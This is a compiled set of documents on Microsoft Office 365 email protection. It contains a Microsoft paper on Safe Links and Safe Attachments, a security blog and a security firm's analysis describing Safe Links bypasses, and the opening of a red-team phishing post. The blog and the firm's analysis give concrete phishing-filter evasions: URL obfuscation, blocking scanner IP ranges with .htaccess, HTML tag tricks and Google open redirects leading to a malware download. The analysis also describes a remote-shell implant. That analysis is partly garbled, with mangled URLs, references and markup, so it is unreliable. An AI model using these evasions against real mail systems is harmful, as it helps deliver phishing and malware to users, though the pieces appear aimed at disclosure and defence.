### Safe attachments helps protect against zero-day exploits and other dangers

Safe attachments helps detect new, malicious attachments before new antivirus signatures are made available to block them. Consider the following scenario:

1. An attacker targets an organization with a new malicious attachment. EOP uses filtering techniques such as looking at the sender's IP address or other email headers. Antivirus signatures help thwart attacks, and antispam filters remove spam.

2. If the email message or attachment doesn't yet have an antivirus/antimalware signature that can block the attack, it goes to a sandbox environment. Safe attachments detonates attachments such as PDFs, Office documents, or executable files. We use behavioral analysis and machine learning to see if the content is malicious.

3. With Dynamic Delivery, the body of an email is delivered while Safe attachments scans the attachment. The email recipient can still read/respond to the email while the attachment is being analyzed. After the attachment is scanned, if it's legitimate, it's delivered to the person's mailbox. If it's malicious, the attachment is filtered out.

### Safe links helps protect against malicious URLs

When people click a link in an email, Safe links protects them by preventing them from going to a malicious site. Safe links blocks the malicious link at the time of click, while allowing people to access legitimate links.

With Safe Links, when someone clicks a link, the link is checked against a list of malicious URLs at the time of click. Consider the following scenario:

1. An attacker compromises a site sends an email that contains the URL that looks like a safe site, and thus passes by the initial reputation check of EOP filters. Because the website seems trustworthy, the URL passes through our filtering pipeline.

2. A few minutes later, the original URL morphs into a malicious website, potentially a phishing site. At this point, the email has already gone through the filtering pipeline.

3. If you enable Safe links, the URL is rewritten so that it redirects to EOP web servers. You can modify Safe links behavior by adding URLs to a list of good/bad URLs. If someone clicks the link, before going to the URL, the link is checked against the latest good/bad URLs. If the link is bad, a warning states that the website is malicious.

Figure 1 shows how EOP, Office 365 ATP, Safe attachments, and Safe links help fight attacks.



*Figure 1. How EOP, Office 365 ATP, Safe attachments, and Safe links help fight attacks*

## URL detonation checks links in a safe environment

URL detonation combines the capabilities of Safe Attachments and Safe Links. When an email contains a linked-to file, URL detonation will examine the linked-to file using our sandboxing technology to determine if the file is malicious. If the file is found to be malicious, at the time of click, a user will be blocked from accessing the malicious linked-to file.

### Reporting and tracing give details on actions taken, messages, and links

- Safe attachments reports show actions that are taken on files (for example, blocked or replaced), file types, date, sender, recipient, subject, and other details).

- To help with quick remediation, Safe links reports show who clicked a malicious link.

- URL tracing tracks malicious links, shows who in the organization is targeted, and shows the types of attacks.

- Reporting and message tracing help with investigating messages that are blocked because of a virus or malware.

## Office 365 ATP enhanced reporting shows malware and spam trends

The Office 365 Security & Compliance Center provides security reports that show trends in your organization—for example, malware and spam that were sent or received, and advanced threats that Office 365 detected and stopped.

## Phishing scenario: Technologies help protect and defend against threats

In the bigger picture, EOP and Office 365 ATP capabilities are an essential part of our broader security platform. This platform includes security capabilities in Office 365 and other Microsoft technologies like Windows Defender ATP, Windows Defender SmartScreen, Windows 10 (Device Guard and Credential Guard), Intune, and Azure Security Center. Figure 2 shows how these technologies help defend against threats and malware in a phishing campaign that targets an organization. The top of the figure shows the threats, and the bottom shows the technology capabilities.



*Figure 2. Office 365, Windows Defender ATP, Azure Security Center, and other technologies combat phishing attacks*

# How Microsoft is enhancing antiphishing technology

At Microsoft, we're continuously advancing how we combat phishing. For example, we use:

- Optimized machine learning algorithms that detect phishing signals in the email body, headers, and URL. To enhance Office 365 ATP and EOP, we extract signals from URLs and attachments. To detect phishing in websites and in attachments such as PDFs, we feed these signals into machine learning models.
- Enhanced clustering, patterns, and anomalies associated with phishing, malware, and spoofing.
- Enhanced real-time reputation lists of domains, IP addresses, senders, and URLs. We also incorporate knowledge from industry-leading feeds.

# Case study: How the Core Services and Engineering organization at Microsoft fights phishing

At Core Services and Engineering—and in our Digital Security and Risk Engineering (DSRE) team at Microsoft—we fight today's complex phishing attacks with a multipronged approach. The DSRE team was developed to help ensure that all company information and services are protected, secured, and available for appropriate use through innovation and a robust risk prevention framework. Across our organization and throughout the company, DSRE constantly evolves the security strategy and protects our assets and our customers' data.

## Our antiphishing approach combines people and technologies

As part of our process, we combine information from employees, product groups, alerts, and other sources with antiphishing capabilities in technologies like EOP and Office 365 ATP—which are part of the Office 365 security stack. Using this approach, we proactively defend against phishing, advanced threats, malware, and zero-day attacks.

From a strategy perspective, these methods give us added visibility into phishing campaigns. Educating employees about phishing and encouraging the mentality of "when in doubt, report it out" provide network defenders with additional telemetry for detecting large-scale phishing campaigns—including sophisticated and targeted spear-phishing attempts.

### How employees report phishing

Methods for gathering phishing information include Microsoft employee reporting and other sources:

- They can report phishing emails or any cybersecurity incident through an internal website.
- They can use the **Report Message** feature in Outlook.

### What DSRE does after phishing information is reported

After the information is reported:

- In DSRE, from the reports we receive in the group mailbox, we analyze the message, attachments, and links. They are triaged, prioritized, and escalated for proper mitigation of the email threat.
- We also get information about phishing activities from our security information and event management (SIEM) system. Our reporting channels and SIEM help us investigate and respond—for example, by flagging phishing sites.

We set up our SIEM to:

- Detect malware infection and compromised accounts.
- Monitor and respond to trojans that steal passwords.
- Get alerts on credential theft.

- Additionally, in DSRE, we use signals and intelligence from a variety of products and product teams, such as Windows Defender ATP and Office 365 ATP.

## Antiphishing capabilities help DSRE protect against advanced threats

Some of the technologies and capabilities we use in DSRE include:

- EOP to help protect against spoofing, known viruses, and 99 percent of spam.
- Office 365 ATP to detect malicious links and attachments, and to track blocked messages and malicious links with Safe links, Safe attachments, URL trace, and Message Trace.
- In the Office 365 Security & Compliance Center, we use Threat explorer to:

  - Search emails and malware, analyze headers in malicious email, and see the impact of phishing and malware.
  - Take action—such as move email to Junk, so that recipients don't open it, click a link, or open an attachment.
  - Get details such as who was affected, the sender and recipient addresses, and what actions were taken.

- Also available in the Office 365 Security & Compliance Center, we use Content Search to see the body of malicious email and get full context for further analysis. For example, we could see if there's an unsafe link in the message.

## How EOP and Office 365 ATP help us

EOP and Office 365 ATP are crucial parts of our overall strategy. For example, we use them to:

- **Take advantage of antispoofing protection in EOP.** Suppose a person in business group A of a company gets an email with a link and attachment from someone in business group B. The latter person requests inside information or personally identifiable information. In this case, the attacker has spoofed the identity of the employee in business group B, but neither employee knows it. The employee in group A might not recognize the sender or may think the request is suspicious, and they report the email.

  As a result, we can see if others got emails from that address, and check if others clicked a link or opened an attachment. EOP can detect something that's spoofed and, at the top of the email, indicate that it's a fraudulent message. We can also have the Exchange team create a rule so that any emails that go to the unsafe address are redirected to our mailbox. We prevent those emails from going to the attacker and can see who's being phished.

- **Help us proactively defend against attacks by checking links and attachments.** Email with unsafe links and attachments can carry advanced threats like zero-day attacks and advanced phishing campaigns. We enable Safe links, for time-of-click protection against malicious URLs. Malicious links are blocked while good links can be accessed. We also enable Safe attachments. Potentially malicious files without a known virus/malware signature are opened in an isolated environment. If no suspicious activity is found, the message is delivered. From the visibility we get, we apply security policies in organizations across Microsoft.

- **Get reporting, message tracing, and URL tracing.** We investigate messages blocked because of a virus or malware. We search on sender, recipient, subject line, and other criteria. With URL trace—based on Safe links— we track malicious links that are clicked. We see how many emails had the link and how many people clicked.

# Benefits of our antiphishing strategy

The technologies and processes that form our broad threat detection strategy help us in many ways:

- **We have better visibility on phishing and get more context about threats.** This helps us to be more proactive. With telemetry from EOP, Threat explorer in Office 365 Threat Intelligence, and antivirus detection on

malicious files, we can see who the business groups and other recipients were and we can spot trends without having to rely on other teams for this information. To be even more proactive, we're working on targeted alerting and clustering, based on specific business groups that receive a suspicious email.

- **We save time and respond faster.** We can search and purge emails on our own—again, without having to rely on other teams as much. In the past, depending on the size of the phishing campaign, searching for malicious emails, and then purging them from email stores, could take days. Now, with Office 365, we can:

  - Search for malicious email ourselves.
  - Use EOP and Office 365 ATP to determine the status of an email or attachment.
  - Delete malicious attachments or move email to the Junk folder to prevent people from interacting with the malicious email.

  For example, even when we faced the large DocuSign phishing campaign, we were able to understand the breadth of the campaign and remediate it within an hour by using Threat explorer, EOP, and Office 365 ATP. In the past, it would have taken days to remove the emails from people's inboxes.

  Plus, from the time we save, we can respond more quickly to threats.

- **We have fewer manual processes.** There used to be much more manual investigation to see who was targeted. Now, we get telemetry up front, which removes a lot of the manual work.

- **For email investigations, we've reduced the number of tools required.** The integration between Threat explorer and Office 365 ATP means fewer places to look for details on a threat and to triage an event.

- Because of integration between technologies in our security platform**, we have good context about what happened before, during, and after an attack.** One example is the integration between Windows Defender ATP and Office 365 services like Threat explorer. Suppose that we're investigating a malware infection. We can see what happened before the infection, such as an email with an attachment that was saved from Outlook. We can use Threat explorer to investigate the email and attachment and determine if that attachment caused the infection. For example, when one email recipient got an alert from Windows Defender ATP about a ransomware infection, we were able to track the malware back to a downloaded file from Outlook.

## Summary

To help protect against increasingly sophisticated phishing attempts, spam, and malware, Microsoft keeps advancing its security capabilities. No one solution can stop all phishing campaigns. However, Office 365 services and capabilities like EOP, Office 365 ATP, Safe links, Safe attachments, and antispoofing—along with other technologies in the broader Microsoft security platform—provide robust defense against phishing, malware, zero-day attacks, and advanced threats. Our technologies evolve as phishing campaigns and other attacks evolve. Antiphishing algorithms, machine learning, clustering, and pattern/anomaly detection further strengthen our security framework for quick detection, enhanced prevention, and targeted response.

## For more information

### Microsoft IT Showcase

microsoft.com/ITShowcase

Microsoft Office 365

*© 2017 Microsoft Corporation. This document is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY. The names of actual companies and products mentioned herein may be the trademarks of their respective owners.*

# APPENDIX 7

## Mikail's Blog

The5 in [s?] stands for Security.

About Me

Contact



I'M LOOKING FOR...

Search ...

SUBSCRIBE TO BLOG VIA EMAIL

If you found any of my posts useful, enter your e-mail address below and be the first to receive notifications of new ones!

Join 166 other subscribers

# Bypassing Safe Links in Exchange Online Advanced Threat Protection

In this article I will go through my findings and analysis on the **Safe Links** feature of Microsoft's Office 365 Exchange Online Advanced Threat Protection.

Essentially what Safe Links does is it rewrites all URLs in in-bound e-mails that pass through the Exchange Online Protection platform. So if you send an e-mail to an organization with Safe Links enabled then the e-mail will look like this (original):

```
Hello Bob,
This is the link I was talking to you about: https://example.com
```

The URL gets rewritten to look like this (passed through Safe Links):

```
Hello Bob,
This is the link I was talking to you about: https://eeas01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fexample.com%2F...
```

## Bypass Method 1

It is not uncommon for organizations to add their own domains to the Safe Links whitelist policy. This is done for one of many reasons... either you trust your own domains or you don't want to inconvenience staff when sending documents internally imagine sending a .pdf on your corporate site to 1,000's of staff – a significant portion would click the link and be presented with this page:



This bypass exploits the whitelisted domains in the Safe Links policy by using URL obfuscation techniques.

Imagine you have Example Ltd which owns the domain example.com. The administrators of example.com have added the example.com domain to the whitelist in their Safe Links policy such that e-mails containing the URL example.com don't get re-written by EOP.

Using a URL obfuscation technique like the below can trick EOP into thinking that the domain is whitelisted when in fact it isn't:

```
Hello Bob,
This is the link I was talking to you about: https://example.com@emtunc.org/malware.exe
```

As you can see, simply obfuscating the URL by posting bogus credentials tricks Safe Links in to thinking that the domain is example.com instead of emtunc.org/malware.exe.

Another obfuscation technique is:

```
Hello Jane in finance,
URGENT – please see outstanding invoice due to us: https://example.com.emtunc.org/malware.exe
```

Here the *advanced* threat protection isn't checking the entire domain – instead it is tricked by a basic obfuscation technique of inserting the white-listed domain as a subdomain of the malicious domain.

## Bypass Method 2

With this technique, an attacker could simply block or re-direct requests from the Exchange Online Protection infrastructure – yup, it's as simple as that. It's less of a vulnerability and more of a non-ideal configuration.

Hopefully, Microsoft makes the EOP IP ranges available online so all you need to do is block those ranges on your webserver with some .htaccess rules.

Even if the IP ranges weren't available online, the EOP requests contain absolutely no headers which makes it very easy to distinguish EOP traffic and genuine traffic.

This is what genuine traffic looks like (notice the browser headers are present):

`1.2.3.4 - - [23/Feb/2017:11:38:26 +0000] "GET /blog/02/2017/ninite-appsheet-patching-just-g`

This is what EOP requests look like (notice how no headers are sent so easy to distinguish from legitimate traffic):

`40.107.196.15 - - [13/Jan/2017:12:24:03 +0000] "GET /malware.exe HTTP/1.1" 404 406 "-" "-"`

## Timeline

- **15/01/2017** – First reported
- **20/01/2017** – I requested an update
- **01/02/2017** – I requested an update
- **07/01/2017** – MSRC claimed a 'bug' caused my replies to be missed. MSRC asked for some further clarifications which I addressed
- **15/02/2017** – I requested an update
- **23/02/2017** – I notified MSRC that I will be publishing this article on the 27th
- **24/02/2017** – I was asked to delay the publishing of this post and notified that a new MSRC case was created
- **15/03/2017** – MSRC advised that the issue doesn't *"meet the security servicing bug bar"* and that they are closing the case
- **16/03/2017** – Published

SHARE THIS:



LIKE THIS:

Loading...

Related posts:

1. **Creating Office 365 Mailboxes in a Hybrid Setup**
2. **Using Adsiedit to Increase User Mailbox Size Beyond 2GB on Exchange Server 2003**
3. **Cisco IronPort E-mail Security Appliance Best Practices : Part 3**
4. **Setting up Lync SRV Records with Claranet – Office 365**
5. **Remove Old ActiveSync Devices on Exchange Using PowerShell**

March 16, 2017   Mikail   ATP, exchange online, office 365

## 2 thoughts on "Bypassing Safe Links in Exchange Online Advanced Threat Protection"



**John**
October 20, 2017 at 3:37 PM

How would you rate the feature in it's current state? I did not see a big update on the service as a result of your publication, but I could have overlooked it. Thanks for sharing your experiences and info.

**Mikail**
October 21, 2017 at 8:51 PM

I haven't used Office 365 for a while now so I honestly couldn't tell you, however I did see at least one additional bypass technique published since my blog post.
I certainly wouldn't discourage anyone from using ATP as it's all

I'M LOOKING FOR...

Search ...

SUBSCRIBE TO BLOG VIA EMAIL

If you would like of the posts useful, enter your e-mail address below and Enter here to receive notifications of new posts.

Join 188 other subscribers

Email Address

SUBSCRIBE!



about defense in depth which I strongly believe in, it's just a shame they could prevent some basic bypasses... or care enough to fix them when they were reported 😄

Comments are closed.

PREVIOUS
**Ninite Appsheet – Patching Just Got Easier**

NEXT
**JWT Refresh Token Manipulation**

I'M LOOKING FOR...

SUBSCRIBE TO BLOG VIA EMAIL

If you found any of my posts useful, enter your e-mail address below and be the first to receive notifications of new posts!

Join 188 other subscribers

SUBSCRIBE!

Proudly powered by WordPress

# APPENDIX
# 8

CRYPTRON SECURITY

CRYPTRON SECURITY

HOME    ABOUT US    OFFER    TRAINING    CONTACT    BLOG    EN    DE

## Security Analysis of Microsoft Office 365 Advanced Threat Protection (ATP)

By admin | Sep 12, 2018 | NoIII kategorisiert | 0 comments |

### Abstract

Microsoft Office 365 Advanced Threat Protection (ATP) is a cloud-based email filtering service that helps protect your organization against unknown malware and viruses by providing robust zero-day protection and includes features to safeguard your organization from harmful links in real-time. Microsoft ATP has rich reporting and URL trace capabilities that give administrators insight into the kind of attacks happening in your organization. Unknown or sophisticated attacks could be addressed in different ways. ATP safe links protect an environment when users click malicious links. ATP safe attachment protect against unsafe attachments and this security feature are offered as part of Office 365.

This report gives an introduction of the summary audit results of the content-filter checks and some bypass techniques for Microsoft ATP safe links feature in Office 365.



Architecture of Microsoft Office 365 Advanced Threat Protection ATP safe links

The security experts of CRYPTRON Security has been contracted to conduct a security audit during the PoC period against Microsoft Advanced Threat Protection (ATP) in Office 365. The security audit with main-focus on ATP safe links research was published in 2018 including an audit summary report. (not public)

The security experts of CRYPTRON Security simulated an external targeted attacker. All security test realized undercontrolled conditions in the CRYPTRON Security Research Labs. The goal of this audit was:

- Testing the ATP safe link & safe attachment service on Windows 10 with Outlook 2016
- Quick ATP content-filter checks with new malware samples (e.g. ThunderShell, PoshC2)
- Identifying if a remote attacker could bypass the safe links & safe attachment feature
- Identifying other vulnerabilities and OWASP Top 10

**During this analysis the security experts of CRYPTRON Security discovered different ways to bypass Advanced Threat Protection (ATP) and Microsoft Safe Links in Office 365**

Please note that this Blogpost documenting the current situation. The discovery of new vulnerabilities can lead to a different situation in only few weeks. Information about Microsoft Advanced Threat Protection (ATP) and Safe Links are also reported in this post.

### Summary content-filter checks in Microsoft Office 365 with ATP

Microsoft Office 365 Advanced Threat Protection (ATP) is a cloud-based email filtering service that helps protect an organization against unknown malware and viruses by providing robust zero-day protection, and includes features to safeguard your organization from harmful links in real-time. ATP has rich reporting and URL trace capabilities that give administrators insight into the kind of attacks happening in your organization.

In an Office 365 ATP filtering-only scenario, ATP provides cloud-based email protection for your on-premises Exchange Server 2013 / 2016 environment, legacy Exchange Server versions, or any other on-premises SMTP email solution. In a hybrid deployment, ATP can be configured to protect your messaging environment and control mail routing when you have a mix of on-premises and cloud mailboxes with Exchange Online Protection for inbound email filtering.

Advanced Threat Protection (APT) across Windows 10 and Office on YouTube



**Advanced Threat Protection demo tour**
Demo tour of Windows Defender ATP and Office 365 ATP

Explore the security across your email and endpoints with the unified ATP (Advanced Threat Protection) experience across Office and Windows. See the spectrum of defense's across known and unknown attacks.

This content-filter line-up gives a short overview about the security robustness in Office 365 with ATP and sending basically malicious attachments. The content-filter Check was done in 2018 – overall severity of each finding is an evaluation of likelihood and system or business impact.

Majoritarian of malware was blocked by Antivirus or ATP filter mechanisms in Office 365.



Microsoft ATP filter check

Microsoft APT filter check with new attack tools

The ThunderShell attack framework was developed for penetration testing reasons and it is basedin Python. It uses a Redis server for HTTPS communication between the implantand the server and PowerShell for execution of the implant on the target clientand any other malicious scripts. The main advantage is that ThunderShell supports certificate pinning for bypassing security products that perform traffic inspection. A similar tool that uses HTTPS as a communication protocoland PowerShell is called PoshC2 – also integral

Search

**Recent Posts**

KeePass password management as a gateway

SACS – Client Communication Congress Summary

Further technical topics were presented and discussed at SACS

Merry Christmas and Happy New Year

Security Analysis of Microsoft Office 365 Advanced Threat Protection (ATP)

Recent Comments

**Archives**

June 2019

December 2018

November 2018

July 2018

April 2018

October 2017

August 2017

February 2017

December 2016

**Categories**

NoIII kategorisiert

**Meta**

Log in

Entries feed

Comments feed

WordPress.org

and control (C&C) server communication.

This screenshot demonstrate a remote shell on the test-client with ThunderShell during the this security research. The ps command is used to provide information about the currently running processes, including their process identification numbers (PIDs).



ThunderShell remote shell ps command

## Security analysis of Microsoft Safe Links in Office 365 with ATP

This section explain security analysis on the Safe Links feature of Microsoft Office 365 Advanced Threat Protection (ATP). Different attack vectors will be illustrated.

**ATP Safe Links**  ATP's Safe Links feature proactively protects your users from malicious hyperlinks in a message. The protection remains every time they click the link, as malicious links are dynamically blocked while good links can be accessed.

**ATP Safe Attachments**  Safe Attachments protects against unknown malware and viruses, and provides zero-day protection to safeguard your messaging system. All messages and attachments that don't have a known virus/malware signature are routed to a special environment where ATP uses a variety of machine learning and analysis techniques to detect malicious intent. If no suspicious activity is detected, the message is released for delivery to the mailbox.

The goal of ATP safe links is to rewrite all URLs in email to a Microsoft URL classification service, at the time of user-clicks it's possible to reclassify a URL. This method is preferred as spammers more often replace the phishing URLs site content after a message is being scanned, hence there is a need of reclassification later.

*"For message in HTML – ATP Safe links identifies any links that uses the HREF attribute. For messages in plain text – ATP Safe Links uses custom logic to identify any text resembling a URL."*
Source: www.microsoft.com

Replacing simple direct links in an email client like Outlook 2016 with links that are almost more than 300 characters long (!), seriously impacts the readability of plain text messages. Most of the ens.imailing lists for professional administrators are sending theirs emails in plaintext format.

For example:



Removing spam red broad and link ATP Safe Links

## Microsoft ATP Safe Links – PoC bypass with script tags

Microsoft Safe Links technology was recently launched by Microsoft through Office 365. The goal of this technology is to rewrite all URLs in email to a URL classification service, at the time of user-clicks it's possible to reclassify a URL. This method is preferred as spammers more often replace the phishing URLs site content after a message is being scanned.

This method should work currently in all email clients- from the web mail to mobile app on the smartphone. However, replacing a URL in HTML as text is difficult.

Bypassing Microsoft ATP Safe Links – PoC <a> tag example:

`<a href="https://www.cryptron.ch">click me</a>`

This method to bypass ATP Safe Links should work correctly in all email clients. From the web mail to your iPhone's Mail app. However, replacing a URL in HTML as text is difficult. Another demonstration to bypass ATP Safe Links is to use a <form> tag. Maybe it not work in all email clients.

Bypassing Microsoft ATP Safe Links – PoC<form> tag example:

`<form action= "https://github.com/mattia-test/issues?since-stamp&edit&sort=oddities-text-files/n/c&/master/access-esssssss-escc-cc-cv-text-tile-add-essssimat-sc-bresc-p=jsct.ptt">input value="Please click me"></form>`







Open PDF in Chrome with reflected EICAR STRING

## Microsoft ATP Safe Links – PoC bypass with *.htaccess

The .htaccess (hypertext access) is the default name of Apache's directory level configuration file. It provides the ability to customize configuration directives defined in the main configuration file. With the .htaccess bypass technique, an attacker could simply block or redirect requests from the Microsoft ATP Safe Links service infrastructure.

Microsoft makes the ATP Safe Link IP ranges available online. An attacker needs only to block those IP ranges on the webserver with .htaccess rules. These facilites include basic redirect functionality for instance if a 404 file not found error occurs or for more advanced functions. The following Microsoft data center IP addresses are used by Microsoft Exchange Online Protection (EOP) and Advanced Threat Protection (ATP) services ik Safe Links.

| Microsoft EOP IP ranges by region | | |
|---|---|---|
| **America** | **EMEA** | **APAC** |
| 23.103.132.0/22 | 23.103.132.0/22 | 23.103.136.0/21 |
| 23.103.136.0/21 | 23.103.144.0/22 | 23.103.152.0/22 |
| 23.103.148.0/22 | 40.92.0.0/16 | 40.92.128.0/17 |
| 23.103.152.0/21 | 40.93.0.0/16 | 40.92.128.0/17 |
| 23.103.156.0/22 | 40.94.0.0/18 | 40.94.128.0/17 |
| 23.103.198.0/24 | 40.95.0.0/18 | 40.95.128.0/17 |
| 23.103.200.0/22 | 40.107.0.0/16 | 40.107.128.0/16 |
| 23.103.212.0/22 | 52.100.0.0/16 | 52.100.128.0/17 |
| 40.92.64.0/18 | 52.101.0.0/16 | 52.101.128.0/17 |
| 40.93.64.0/18 | 52.102.0.0/16 | 52.102.128.0/17 |
| 40.94.64.0/18 | 52.103.0.0/16 | 52.103.128.0/17 |
| 40.95.64.0/18 | 94.245.120.64/27 | 65.55.88.0/24 |
| 40.107.64.0/18 | 104.47.0.0/19 | 104.47.64.0/18 |
| 52.100.64.0/18 | 157.55.234.0/24 | 134.170.132.0/24 |
| 82.101.64.0/18 | 157.56.112.0/24 | 134.170.140.0/24 |
| 52.102.64.0/18 | 213.199.154.0/24 | 207.46.51.64/26 |
| 52.103.64.0/18 | 213.199.180.128/26 | |
| 65.55.169.0/24 | | 2a01:111:f400:7e00::/54 |
| 104.47.32.0/19 | 2a01:111:f400:7e00::/56 | |
| 157.56.110.0/23 | 2a01:111:f400:fe00::/56 | |
| 207.46.100.0/24 | | |
| 207.46.163.0/24 | | |
| 216.32.180.0/23 | | |
| 2a01:111:f400:7c00::/54 | | |

Microsoft Exchange Online and Advanced Threat Protection IP range

## Microsoft ATP Safe Links – PoC bypass with Google redirect parameter

A new phishing attack against Microsoft Office 365 customers uses Google's App Engine website to redirect email victims to download malicious files. Interesting for an attacker because this attack vector takes advantage of the trust level in Google's server to bypass ATP Safe Links filters. Security researcher and OWASP named it invalidated open redirect vulnerability.

There are multiple versions of the attack that use the same vulnerability but in this example, the victim received an incident email with a bit.ly (shorted-URL) to download a malformed document. The URL redirects the victim to one of a few know malware or phishing websites or an information landing page from Google.

We will walk through the bypass techniques and the first level of misdirection is a well-know attack scenario. By replacing the URL with a bit.ly link to keep the victim to click on it. E-Mail filters are not fooled and will resolve basically URL-shortened links to find the target website. This attack method helps to bypass Microsoft ATP Safe Links.





Incoming Phishing email with URL-shortened link from bit.ly

The first part of the URL takes advantage of Google's trust in it's own domain when redirecting URLs from the search engine. For example if an attacker types in the browser the URL:

https://www.google.com/url?1ce=0&q=https://www.cryptron.ch

Google redirects to whatever URL. If a user puts in the "q=" parameter because attackers use this method to hide malicious website behind the trusted Google domain. Google responed by stopping the user with this message



Google redirect notice for www.cryptron.ch

However, if a user redirecting to a Google website there is no warning message. Therefore the URL https://www.google.com/url?sa=D&q=https://www.cryption.ch flashes some seconds in the browser and then continues automatically. The attacker is basically taking advantage of Google's trust level and domain.

This section demonstrates another example but this time with a malicious link to malware. Of course an attacker can rename the malformed file eicar-standard-antivirus-the-file-adobe-acrobate-javascript-alert.pdf for hiding filenames on the attacker webserver. This method raises also the possibility to bypass ATP Safe Links and infect coprate users with Spear-Phishing attacks.

https://www.google.com/url?sa=D&q=https://www.cryptron.ch/eicas-standard-antivirus-test-file-adobe-acrobat-javascript-alert.pdf

## ATP Safe Links – PoC bypass with Google App Engine

Google App Engine often referred to as GAE or simply Google App Engine is a web framework and cloud computing platform for devloping and hosting web applications in Google-managed data centers. Applications are sandboxed and run across multiple servers. Google App Engine offers automatic scaling for web applications – as the number of requets increases for an application Google's App Engine automatically allocates more ressource for the web application to handle the additional demand.

This screenshot demonstrates an ATP Safe Links bypass method with Google App Engine

| 1. Google Redirect Trust Vulnerability | 2. Google AppEngine Open Redirect Vulnerability |
|---|---|

Google App Engine URL with Javascript payload

This open redirect vulnerability to bypass ATP Safe Links takes advantage of a website that takes redirect-links as a URL parameter but does not validate it before forwarding to the user. Many websites use redirect-links as a URL parameter and there is nothing inherently wrong with that. For example website gated content and Single Sign-On (SSO) use this mechanism often with XML SOAP requets. It becomes a vulnerability once the website does not check the validity of the URL parameter and send the corporate user to a malicious website ormalfrmed file. Also drive by infection vectors are possible with this method.

Unfortunately, Google's App Engine does not "check" the URL and the re-direct path – an attacker can put any link after "logout?continue=" in the attack URL.

Google App Engine does not verify this link and redirect any user to the malicious website. The embedded URL with compliance.php downloads an encrypted Javascript file called "compliant_details.js" that by default open the browser and execute the script locally on the system of the victim. To evade predictive and static analysis it builds own functions and variables on the fly – the Javascript script file contact an external webserver farm to download a TXT file containing binary code for executing with Wscript.exe on Microsoft Windows. An attack sample for macOS Mojave (Release 10.14 ) are in progress.

Malicious file
from
compliance.ph
p script with
encrypted
Javascript
(attack)
payload

## Conclusion

An organization keeps an archive of business emails going back over a decade. Emails are important for record keeping especially true for public institutions

Microsoft ATP Safe Links service relies on Microsoft servers continuously running to scan and translate clicked URLs from millions of users. If Microsoft ever discontinues this service all of this Links in the email archives will become completely unusable. Links in emails themselves may not even contain all the information in the orignal URL – the original destination may not even be able to be deciphreable in the future. That does not make sense for record-keeping approach

The European Union will start to enforce the General Data Protection Regulation (GDPR) since May 2018. In term of content, the EU GDPR leads to various key innovations such as the "right to forget", whereby data subjects can have their data breaches. New are that companies that violate the GDPR rules can be sanctioned with a maxium fine of 20 million euros or 4 percent of the annual turnover

This secnario in Microsoft ATP Safe Links for Office 365 appears to suggest that the organization will receive reports with individually identifying information about every link clicked by every email user in the Cloud. Surely, there are some tradeoff's between privacy and security but this seems at least, like a significant movement away from the norms of privacy that employees currently expect – in addition, Microsoft ATP Safe Links can be bypassed with technical methods as described in this blog.

References:
https://docs.microsoft.com/en-us/office365/securitycompliance/atp-safe-links
https://docs.microsoft.com/en-us/office365/securitycompliance/office-365-atp
https://technet.microsoft.com/de-de/library/jj721190/exechg.1601.aspx
https://euro.mintpsa.eu/legal-content/EN/TXT/?uri=CELEX%3A32016R0679
https://www.ndcxd-admin.ch/edoeb/en/home.html
http://www.wave1s.com/2016/04/where-are-my-office-365-services-located_25.html
https://docs.microsoft.com/de-ch/office365-emethysse/safe-and-ip-address-ranges?redirectSourcePath=%2525en-de%252farticle%252818%252c-safe-IP-&dewubewecive-won-Office-ch3cb444a211-26c7-47cb-a6b1-2b5aa5aeff6d
https://www.nexup.org/index.php/UHomtHawoll_#ddirecto_amf_Forwords_Clrem_Gmeer
https://httpd.apache.org/Auro/2.4/howto/Applesse.html
https://stackoverflow.com/questions/1020368/how-can-i-hide-or-encrypt-javascript-code
https://stackoverflow.com/questions/10916284/how-to-encrypt-decrypt-script.php

## Submit a Comment

Your email address will not be published. Required fields are marked *

Comment *

Name *

Email *

Website

☐ Save my name, email, and website in this browser for the next time I comment.

[Submit Comment]



Individual consultation begins with the first
contact

CRYPTRON Security GmbH
Stefan Mettler, Chief Executive Officer (CEO)

Imprint
Condition

+41 52 366 80 87
info@cryptron.ch

© 2005 - 2020 PROTECTION FOR YOUR BUSINESS - SWISS ETHICAL HACKING

# APPENDIX 9

Strategic and Technical Blog ›› Social Engineering



## Introduction: Bypassing Email Security

This post will be the first of a series on advanced phishing capabilities and bypassing email security mechanisms. The focus is on URL analysis and bypassing link scanning capabilities, with Microsoft's O365 linkscanning filters used for demonstration.

The phishing techniques discussed here are not new but their continued success demonstrates the need for continued developments in email security.

Though many of the methods discussed throughout the series are not new, the very fact that most of them are successful in our social engineering engagements is an indicator that there is a lot of work to do, and defense teams need to address them.

## Phishing Background

One key area of any redteam assessment is email phishing or social engineering, and much has been written on the subject. Although the risk of phishing is well documented, detailed information on how attackers are circumventing these defenses is important to mitigating these attacks.

User training and education is extremely important, and there are many resources online and companies like Rhino that can assist you in putting together a good education program to help deal with the human element of this attack vector. Defense teams can not stop there, as observed in Verizon's 2018 DBIR report: "4% of people will click on any given phishing campaign".

## Effectiveness of Anti-Phishing Tools

Many organizations will opt to use third-party mail exchanges like Google Mail, Office365 and others, and rely solely on those services' defense mechanisms. Although these services do a good job at dealing with common spam, default configurations may not help you in detecting, stopping or mitigating more sophisticated email attacks. Proper configuration is vital to an effective anti-phishing strategy.

When evaluating email security services, it's important to understand how malicious emails are identified, and ask questions such as...

- Does the sender domain have a valid SPF record, and is the connecting IP part of the accepted senders whitelist?
- Does the sender IP have a valid DKIM record, and is the email authentication or signature valid?
- Does the sender domain have a valid DMARC record, if so, is there a policy set to deal with bad emails?
- Does the email content itself match known malicious emails ("Click here to reset your password")?
- Are there links in the email to negatively reputed domains or landing page URLs?
- Are there links in the email that point to login pages that are detected by link protection scanning mechanisms?
- Is the attachment in the email known to be malicious? Or is detected or flagged by signature based systems?
- (custom) Is the sender domain a permutation of the receiving domain?
- (custom) Is the sender domain a newly created or uncategorized domain?

This list is by no means complete, and I'm sure there is a lot more work being done on the backend for each service respectively. This is especially the case when a customer brings in a third party mail security provider like Proofpoint or Mimecast where they may employ other techniques that would be unseen to the attacker and users.

Our aim with every engagement is to analyze the mail server in use, identifying any security providers and preparing circumvent as many technical controls as possible.

For the sake of brevity for this first article in the series, we will be focusing on link scanning mechanisms employed by Microsoft, although what is discussed can also be applied to other services.

## Microsoft Exchange Online Protection (EOP)

